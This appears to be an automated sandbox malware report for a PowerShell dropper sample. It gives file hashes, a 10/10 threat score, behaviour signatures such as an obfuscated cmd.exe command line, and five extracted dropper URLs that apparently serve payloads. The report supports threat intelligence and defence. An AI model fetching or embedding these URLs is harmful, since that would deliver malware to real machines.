General

  • Target

    5151bd3104394432cffa51af08f04180_JaffaCakes118

  • Size

    64KB

  • Sample

    240517-y4xvfahb8x

  • MD5

    5151bd3104394432cffa51af08f04180

  • SHA1

    97d1b370994ef8fa437a072c2b5f7d894fcfe793

  • SHA256

    e4a8ef4a30f6ae792c62a1b9f811b5d0bb1a4e92f5e1d0380e9ab1d36ee59290

  • SHA512

    f415ec2e78de75043ab855bc3461700b29dbb8e4150e4bc54dacc3206d729bfb6bd396a110b1bc355fa13e86706861e8fc7d8cec22e8f7ebc6000800b2ff85ba

  • SSDEEP

    768:8pJcaUitGAlmrJpmxlzC+w99NBD+1onWSBzY4j8NrcBYbhn8R:8ptJlmrJpmxlRw99NBD+an1c8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://alignsales.com/5iTjBVHgiZ

exe.dropper

http://aquatroarquitetura.com.br/xqk3qb5a

exe.dropper

https://adamant.kz/CVjsyDag

exe.dropper

http://02feb02.com/d8rOmLBT

exe.dropper

http://pornbeam.com/B6v8OJvL

Targets

    • Target

      5151bd3104394432cffa51af08f04180_JaffaCakes118

    • Size

      64KB

    • MD5

      5151bd3104394432cffa51af08f04180

    • SHA1

      97d1b370994ef8fa437a072c2b5f7d894fcfe793

    • SHA256

      e4a8ef4a30f6ae792c62a1b9f811b5d0bb1a4e92f5e1d0380e9ab1d36ee59290

    • SHA512

      f415ec2e78de75043ab855bc3461700b29dbb8e4150e4bc54dacc3206d729bfb6bd396a110b1bc355fa13e86706861e8fc7d8cec22e8f7ebc6000800b2ff85ba

    • SSDEEP

      768:8pJcaUitGAlmrJpmxlzC+w99NBD+1onWSBzY4j8NrcBYbhn8R:8ptJlmrJpmxlRw99NBD+an1c8

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.

MITRE ATT&CK Enterprise v15

Tasks